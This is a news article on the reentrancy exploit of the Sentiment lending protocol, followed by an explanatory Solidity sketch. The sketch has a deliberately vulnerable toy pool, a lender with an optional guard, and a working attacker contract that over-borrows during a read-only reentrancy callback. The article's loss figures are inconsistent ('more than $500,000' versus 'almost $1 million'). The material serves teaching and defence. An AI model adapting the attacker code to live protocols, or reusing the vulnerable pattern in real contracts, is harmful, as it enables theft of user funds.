Key takeaways:
- Sentiment, an undercollateralized lending protocol on Arbitrum, has been exploited for more than $500,000 in cryptocurrency.
- The attack on the DeFi lending platform has been classified as a reentrancy attack.
- The attacker appears to have drained the tokens by exploiting a reentrancy bug and then bridged them to the Ethereum network.
A malicious exploit affected Sentiment, a decentralised finance (DeFi) tool that provides lending and borrowing services on the Arbitrum layer-2 network, causing a loss of almost $1 million.
According to the team's Twitter thread, it paused the main Sentiment contract and limited it to processing withdrawals only, to prevent the loss of further funds.
Data from the Ethereum network shows a transaction that moved 536,738.410031 USDC out of the Synapse Bridge. That transfer links back to a chain of Arbitrum transactions that drained Sentiment of its funds.
The team has worked with outside security auditors to deploy a user-friendly fix, so that users can repay their debts and exit their positions. To identify the attacker and recover the funds, the team is also working with law enforcement and other parties.
According to developer Pascal Marco Caversaccio, the incident was probably a reentrancy attack: a third-party contract repeatedly called back into an exposed Sentiment contract before that contract could update its state.
A reentrancy attack occurs when a contract hands control to an external address, for example by sending it funds, before it has finished updating its own accounting, and the recipient uses that callback to call back into the contract while its state is still stale. In the classic form the attacker repeatedly withdraws funds; in the read-only (view) form the attacker does not re-enter a state-changing function at all, but reads a temporarily wrong value from a view function and uses it in another protocol that trusts that value.
Another protocol fell prey to a similar read-only reentrancy attack in February. dForce, an integrated platform for DeFi protocols, lost about $3.65 million when an attacker abused the pools of Curve Finance, an automated market maker (AMM) that runs on Optimism and Arbitrum, whose pricing dForce relied on.
Sentiment also contacted the hacker, offering a bounty of 10% of the stolen funds in exchange for the return of the rest: if the assets were returned by 8 a.m. UTC on April 6, the team would pay $95,000.
PeckShield, the platform's security advisor, published an analysis of the exploit on its blog, outlining how the attacker used a read-only (view) reentrancy bug in Balancer to manipulate the pool balances that Sentiment's pricing relied on, so that the attacker's collateral appeared to be worth far more than it was and loans could be drawn against it.
According to PeckShield, the attacker made off with roughly $1 million worth of cryptocurrency after draining large amounts of tokens from Sentiment, using flash loans to fund the manipulation.
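The two passages above describe the mechanism in prose: a pool hands control to the caller mid-exit, a view function returns stale balances during that callback, and a lender that prices collateral through that view can be made to over-lend. The following Solidity sketch is an added example, not Sentiment's, Balancer's or PeckShield's code; every contract and function name in it (ToyPool, Lender, Attacker, sharePrice, ensureNotInPoolContext) is hypothetical, and the pool is deliberately simplified to ETH and a single share count. It shows the vulnerable read path, the attacker's callback, and the guard an integrator can add: a probe call that reverts whenever the pool is inside a guarded function. Balancer's published guidance for integrators takes the same shape, making a call into the Vault that reverts while the Vault's reentrancy guard is set.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Hypothetical pool standing in for a Balancer-style pool whose balances a lender
// reads through a view function. Illustrative only; not Balancer's or Sentiment's code.
contract ToyPool {
    mapping(address => uint256) public shares; // LP shares: 1 wei joined = 1 share
    uint256 public totalShares;
    uint256 public reserve;   // the pool's tracked ETH balance, as an oracle would read it
    uint256 private _entered; // reentrancy-guard flag for state-changing calls
    modifier nonReentrant() {
        require(_entered == 0, "reentrant");
        _entered = 1;
        _;
        _entered = 0;
    }

    function join() external payable {
        shares[msg.sender] += msg.value;
        totalShares += msg.value;
        reserve += msg.value;
    }

    // View used to price one share (1e18 precision). Nothing stops it being read mid-exit.
    function sharePrice() external view returns (uint256) {
        return totalShares == 0 ? 1e18 : (reserve * 1e18) / totalShares;
    }

    // The bug: shares are burned and ETH is sent before `reserve` is reduced, so while
    // the recipient's fallback runs, sharePrice() divides a stale reserve by a smaller
    // supply. nonReentrant blocks re-entering exit() itself, but not re-reading the view.
    function exit(uint256 amount) external nonReentrant {
        shares[msg.sender] -= amount;
        totalShares -= amount;                            // denominator already shrunk
        (bool ok, ) = msg.sender.call{value: amount}(""); // control handed to the caller
        require(ok, "transfer failed");
        reserve -= amount;                                // numerator updated too late
    }

    // Probe for integrators: reverts whenever the pool is inside a guarded call.
    function ensureNotInPoolContext() external view {
        require(_entered == 0, "pool is mid-call");
    }
}

// Lender that accepts pool shares as collateral and prices them with sharePrice().
// Deploy it funded (payable constructor) so it has ETH to lend.
contract Lender {
    ToyPool public immutable pool;
    bool public immutable hardened; // true: probe the pool before trusting the view
    mapping(address => uint256) public collateralShares;
    mapping(address => uint256) public debt;
    constructor(ToyPool p, bool hardened_) payable { pool = p; hardened = hardened_; }

    // Toy shortcut: collateral is recorded, not transferred; only the pricing path matters.
    function postCollateral(uint256 amount) external { collateralShares[msg.sender] += amount; }

    function collateralValue(address who) public view returns (uint256) {
        if (hardened) pool.ensureNotInPoolContext(); // reverts during the attacker's callback
        return (collateralShares[who] * pool.sharePrice()) / 1e18;
    }

    // Borrow up to 50% of collateral value, priced at call time.
    function borrow(uint256 amount) external {
        debt[msg.sender] += amount;
        require(debt[msg.sender] * 2 <= collateralValue(msg.sender), "undercollateralized");
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

// Attacker: call attack{value: 10 ether}(9 ether, 4 ether). Posting 1 ether of shares as
// collateral normally allows a 0.5 ether loan; inside receive() reserve is still 10 ether
// while totalShares is 1 ether, so the share price reads 10x and 4 ether is approved.
// Against a hardened Lender the probe reverts, the ETH transfer fails, and exit() reverts.
contract Attacker {
    ToyPool private immutable pool;
    Lender private immutable lender;
    uint256 private pendingBorrow;
    bool private inExitCallback;
    constructor(ToyPool p, Lender l) { pool = p; lender = l; }

    function attack(uint256 exitAmount, uint256 toBorrow) external payable {
        pool.join{value: msg.value}();
        lender.postCollateral(1 ether);
        pendingBorrow = toBorrow;
        inExitCallback = true;
        pool.exit(exitAmount); // hands control to receive() below
        inExitCallback = false;
    }

    receive() external payable {
        if (inExitCallback) {
            inExitCallback = false;       // borrow() also sends ETH here; do not recurse
            lender.borrow(pendingBorrow); // priced against the stale reserve
        }
    }
}
```

The point of the probe is that a view function cannot tell whether it is being read from inside an unfinished state transition, so the consumer has to ask the pool. Checking that the probe reverts is cheap, but it only helps if every pricing path in the lender goes through it; a second oracle path that reads sharePrice() directly reopens the hole.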